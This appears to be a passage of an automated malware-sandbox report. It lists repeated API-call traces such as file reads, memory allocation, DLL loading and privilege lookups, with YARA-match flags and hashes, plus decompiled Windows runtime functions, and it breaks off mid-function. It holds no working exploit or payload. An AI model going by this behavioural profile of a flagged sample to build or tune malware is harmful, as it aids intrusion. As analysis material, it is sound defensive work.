                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0235F010,?,?,00000000), ref: 02368DAC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2422867632-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0235F010,?,?,00000000), ref: 02368DAC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2422867632-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0235F192,0235F192,?,00000000,?,?), ref: 0236A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(023644F6,?,02364C6F,02364C6F,?,023644F6,?,?,?,?,?,00000000,00000000,?), ref: 0236A21D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction ID: b01a1704dd4e264620ff27a711054d16d373577785363c93157488b08be946b7
                                                                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction Fuzzy Hash: 1EE046B1200208ABDB24EF99DC44EA777ADEF88750F118559FE086B241C630F910CBF0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,02358CF4,?), ref: 0235F6BB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                                                          • Instruction ID: 088962a13b16ba739f371ebc1e379e4c824d1e3d60f94eff71738df223bab499
                                                                                                                          • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                                                          • Instruction Fuzzy Hash: 3AD0A7727903043BE620FAE49C07F2772CD5B45B04F494064FE4CDB3C7DA54E0104565
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(023644F6,?,02364C6F,02364C6F,?,023644F6,?,?,?,?,?,00000000,00000000,?), ref: 0236A21D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: acd4ac879795ac88126d437e28d31ad21b67696f3ae5b45ffb214866f0c54eba
                                                                                                                          • Instruction ID: d91af1884d4f951ea0e8597c0542fc700074d0413efdd962b5fa94195d8d03b1
                                                                                                                          • Opcode Fuzzy Hash: acd4ac879795ac88126d437e28d31ad21b67696f3ae5b45ffb214866f0c54eba
                                                                                                                          • Instruction Fuzzy Hash: FAD0C9B4200109ABC710EF58E8948BB736EAF88214711C505FC1953205C531D8208AB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4a0af53925cb40027101d15b397160ddce3b1b7230483153d0cb383aa82f1447
                                                                                                                          • Instruction ID: 2e261c451f9fdc000f07b3aed2bfad94e43531686deb67f9adac6b5b2e8eb4a6
                                                                                                                          • Opcode Fuzzy Hash: 4a0af53925cb40027101d15b397160ddce3b1b7230483153d0cb383aa82f1447
                                                                                                                          • Instruction Fuzzy Hash: FFB09B729414C5C9DA11E7A44608727790177D4741F26C555D1020765A4778C4D1F6B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E02E1FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                          				void* _t7;
                                                                                                                          				intOrPtr _t9;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				intOrPtr* _t12;
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				intOrPtr _t14;
                                                                                                                          				intOrPtr* _t15;
                                                                                                                          
                                                                                                                          				_t13 = __edx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_t14 =  *[fs:0x18];
                                                                                                                          				_t15 = _t12;
                                                                                                                          				_t7 = E02DCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                          				_push(_t13);
                                                                                                                          				E02E15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                          				_t9 =  *_t15;
                                                                                                                          				if(_t9 == 0xffffffff) {
                                                                                                                          					_t10 = 0;
                                                                                                                          				} else {
                                                                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                          				}
                                                                                                                          				_push(_t10);
                                                                                                                          				_push(_t15);
                                                                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                          				return E02E15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E1FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E1FE01
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E1FE2B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 930152a9e628fddc03ae31eb12d2d3b529d263eecc04c6da29c21c23f7943ef4
                                                                                                                          • Instruction ID: 64ada48cc3faed8742137f190feb397f50f4971089b0f9a69e36350dd6767ebf
                                                                                                                          • Opcode Fuzzy Hash: 930152a9e628fddc03ae31eb12d2d3b529d263eecc04c6da29c21c23f7943ef4
                                                                                                                          • Instruction Fuzzy Hash: 51F0F672240241BFE6311A55DC06F23BF6BEB84730F244325F628566D1EAA2FC60D6F0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00E89F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`$wK
                                                                                                                          • API String ID: 823142352-4126523962
                                                                                                                          • Opcode ID: 83e15d0d1536b05d97b01dc0a6296594f924e01e243923ca3195c2d783ebab47
                                                                                                                          • Instruction ID: 32664e650ea5f11229595c4df8403f8bf7ac3241f7d521a7cb10ecbefb8ec897
                                                                                                                          • Opcode Fuzzy Hash: 83e15d0d1536b05d97b01dc0a6296594f924e01e243923ca3195c2d783ebab47
                                                                                                                          • Instruction Fuzzy Hash: 6301B6B2204108AFDB08DF98DC95EEB37EAAF8C754F158659BA1DD7251C630E811CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00E89F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`$wK
                                                                                                                          • API String ID: 823142352-4126523962
                                                                                                                          • Opcode ID: 40b7c4121765085cce412e3b304e513b3eb0290636f74b43cd85688f8fcaf1f7
                                                                                                                          • Instruction ID: cb81e5e5aaa88cb10e90248faf9d8c2ec72579311cfa5b1540b5fec8ea378bca
                                                                                                                          • Opcode Fuzzy Hash: 40b7c4121765085cce412e3b304e513b3eb0290636f74b43cd85688f8fcaf1f7
                                                                                                                          • Instruction Fuzzy Hash: 3F01B2B2205108AFDB08CF98DC95EEB37EAAF8C754F158649FA1DD7241C630EC118BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00E89F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`$wK
                                                                                                                          • API String ID: 823142352-4126523962
                                                                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction ID: 85fb197be0223bf8d734ebe5e1d27c2368562061cb0991e843651bf8e7518590
                                                                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction Fuzzy Hash: D3F0B2B2200208AFCB08DF88DC95EEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00E84D10,?,?,00E84D10,00000000,FFFFFFFF), ref: 00E8A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 253c5ad76745aedc14c6557aaf28ef044f9e8d0b7a0466cd19501b4d5afdb99b
                                                                                                                          • Instruction ID: 10dc72dda8f69a421bb4ebcaef88d501761bcd5cc3d6e6811b66c11705916f67
                                                                                                                          • Opcode Fuzzy Hash: 253c5ad76745aedc14c6557aaf28ef044f9e8d0b7a0466cd19501b4d5afdb99b
                                                                                                                          • Instruction Fuzzy Hash: FDF05476600214AFD710EF98DC40EA777A9EF88310F14855AFA5C9B281C631E91187A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00E849F1,?,?,?,?,00E849F1,FFFFFFFF,?,2M,?,00000000), ref: 00E8A015
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00E849F1,?,?,?,?,00E849F1,FFFFFFFF,?,2M,?,00000000), ref: 00E8A015
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00E72D11,00002000,00003000,00000004), ref: 00E8A139
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00E84D10,?,?,00E84D10,00000000,FFFFFFFF), ref: 00E8A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00E844F6,?,?,oL,?,00E844F6,?,?,?,?,?,00000000,00000000,?), ref: 00E8A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oL
                                                                                                                          • API String ID: 1279760036-2024872671
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E73AF8), ref: 00E8A25D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E7AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E7AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,00000000,?,?,?,00000001), ref: 00E8A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E7F192,00E7F192,?,00000000,?,?), ref: 00E8A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E7F192,00E7F192,?,00000000,?,?), ref: 00E8A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,00000000,?,?,?,00000001), ref: 00E8A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00E844F6,?,?,oL,?,00E844F6,?,?,?,?,?,00000000,00000000,?), ref: 00E8A21D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          C-Code - Quality: 41%
                                                                                                                          			E03687CC0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				signed int _t60;
                                                                                                                          				signed int _t65;
                                                                                                                          				void* _t70;
                                                                                                                          				void* _t73;
                                                                                                                          				signed int _t86;
                                                                                                                          				void* _t92;
                                                                                                                          				signed int _t94;
                                                                                                                          				intOrPtr _t101;
                                                                                                                          				signed int _t102;
                                                                                                                          				intOrPtr _t103;
                                                                                                                          				intOrPtr _t104;
                                                                                                                          				signed int _t105;
                                                                                                                          				signed int _t115;
                                                                                                                          				intOrPtr _t116;
                                                                                                                          				signed char _t117;
                                                                                                                          				void* _t118;
                                                                                                                          				intOrPtr* _t120;
                                                                                                                          				signed int _t121;
                                                                                                                          				void* _t122;
                                                                                                                          
                                                                                                                          				_t101 = _a8;
                                                                                                                          				_t120 = _a4;
                                                                                                                          				_t121 = 0;
                                                                                                                          				_t104 = _t101 + 0x2e;
                                                                                                                          				_v24 = 8;
                                                                                                                          				_v16 = _t104;
                                                                                                                          				if( *_t120 == 0) {
                                                                                                                          					__eflags =  *(_t120 + 2);
                                                                                                                          					if( *(_t120 + 2) != 0) {
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t120 + 4);
                                                                                                                          					if( *(_t120 + 4) != 0) {
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t120 + 6);
                                                                                                                          					if( *(_t120 + 6) != 0) {
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					_t117 =  *(_t120 + 0xc) & 0x0000ffff;
                                                                                                                          					_v20 = _t117 >> 8;
                                                                                                                          					__eflags = _t117;
                                                                                                                          					if(_t117 == 0) {
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					_t86 =  *(_t120 + 8) & 0x0000ffff;
                                                                                                                          					__eflags = _t86;
                                                                                                                          					if(_t86 != 0) {
                                                                                                                          						_v12 = 0xffff;
                                                                                                                          						__eflags = _t86 - _v12;
                                                                                                                          						if(_t86 != _v12) {
                                                                                                                          							goto L1;
                                                                                                                          						}
                                                                                                                          						__eflags =  *(_t120 + 0xa);
                                                                                                                          						if( *(_t120 + 0xa) != 0) {
                                                                                                                          							goto L1;
                                                                                                                          						}
                                                                                                                          						__eflags = _t104 - _t101;
                                                                                                                          						_push( *(_t120 + 0xf) & 0x000000ff);
                                                                                                                          						_push( *(_t120 + 0xe) & 0x000000ff);
                                                                                                                          						_push(_v20 & 0x000000ff);
                                                                                                                          						_t92 = E036D6B30(_t101, _t104 - _t101, "::ffff:0:%u.%u.%u.%u", _t117 & 0x000000ff);
                                                                                                                          						L29:
                                                                                                                          						return _t92 + _t101;
                                                                                                                          					}
                                                                                                                          					_t94 =  *(_t120 + 0xa) & 0x0000ffff;
                                                                                                                          					__eflags = _t94;
                                                                                                                          					if(_t94 == 0) {
                                                                                                                          						_t118 = 0x36648a4;
                                                                                                                          						L27:
                                                                                                                          						_push( *(_t120 + 0xf) & 0x000000ff);
                                                                                                                          						_push( *(_t120 + 0xe) & 0x000000ff);
                                                                                                                          						_push(_v20 & 0x000000ff);
                                                                                                                          						_push( *(_t120 + 0xc) & 0xff);
                                                                                                                          						_t92 = E036D6B30(_t101, _t104 - _t101, "::%hs%u.%u.%u.%u", _t118);
                                                                                                                          						goto L29;
                                                                                                                          					}
                                                                                                                          					__eflags = _t94 - 0xffff;
                                                                                                                          					if(_t94 != 0xffff) {
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					_t118 = 0x367d700;
                                                                                                                          					goto L27;
                                                                                                                          				}
                                                                                                                          				L1:
                                                                                                                          				_t105 = _t121;
                                                                                                                          				_t60 = _t121;
                                                                                                                          				_v8 = _t105;
                                                                                                                          				_v20 = _t60;
                                                                                                                          				if(( *(_t120 + 8) & 0x0000fffd) == 0) {
                                                                                                                          					__eflags =  *(_t120 + 0xa) - 0xfe5e;
                                                                                                                          					if( *(_t120 + 0xa) == 0xfe5e) {
                                                                                                                          						_v24 = 6;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t115 = _t121;
